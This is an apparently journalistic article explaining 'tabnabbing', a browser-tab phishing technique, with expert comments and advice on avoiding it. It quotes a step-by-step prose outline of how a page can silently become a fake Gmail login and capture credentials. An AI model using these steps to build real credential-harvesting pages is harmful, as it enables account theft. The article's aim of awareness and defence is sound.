Tabnabbing, A Hacker's Latest Phishing Expedition

How many of us leave a half-dozen or so tabs open in our browser throughout the course of the day? Apparently this is the new breeding ground for hackers to lie in wait. The latest malware to hit the digital airways is called 'tabnabbing' and it seizes on an opportunity to steal passwords when users log-in to email or banking accounts, and leave the tabs open for a period of time.

The scenario is such that by leaving your email accounts open, they sometimes time-out. This allows hackers to introduce a new page that while looking like your previous sign-in page is actually a clone. When the user re-registers, he or she is handing over the keys to your kingdom - your passwords!

Aza RaskinAza Raskin"Tabnabbing" is a vulnerability in tabbed browsers recently identified by Aza Raskin, founder of the music search site Songza and creative lead for the Firefox browser at Mozilla. He explains it as such:

How The Attack Works
  •    1. A user navigates to your normal looking site.
  •    2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
  •    3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
  •    4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
  •    5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

Here's some more insight into Raskin's description as to how tabnabbing works.

According to an Inc. report, tabnabbing is more a theory than used in actual practice. Raskin reports that while he is aware of research being done in this area, "I do not believe anyone has reported it being used in the wild." 

This then begs the question whether Raskin has tipped hackers off to a new trick? No, says Dirk Morris, CTO of Untangle, which provides open source security software. "The people doing it are truly innovative, so they would have found this vulnerability on their own." Besides, he notes, Raskin's bringing tabnabbing to the world's attention means that browsers will now work on fixes for it, although, as he acknowledges, there are no fixes yet.

Paul Ducklin, head of technology, Asia Pacific for the security firm Sophos, suggests the easiest way to avoid tabnabbing of your bank site is to open only the bank site, in a window of its own, with no other tabs. "That way, there is never a hidden tab on which the bad guys can change things in the background," he says.

A solution to phishing attacks of any kind is purchase 'password-protection software.' Software like RoboForm stores all your login information on your computer, in a file protected by a master password. Once you log in to RoboForm, it takes one click to log in to a password-protected website. Ducklin says. "This means you can use really secure passwords like 'awsdWE$FRERV2314:fgv.' The software generates them randomly and you can be certain you have a different password for every site." Roboform costs $30 for unlimited passwords; free for up to 10.

Looks like while tabnabbing can be exploited by hackers, there are preventative forces at work to catch them before they can take tabnabbing to another level. Now, that's the kind of preemptive strike that works in our favor - catching the phisher before he catches you!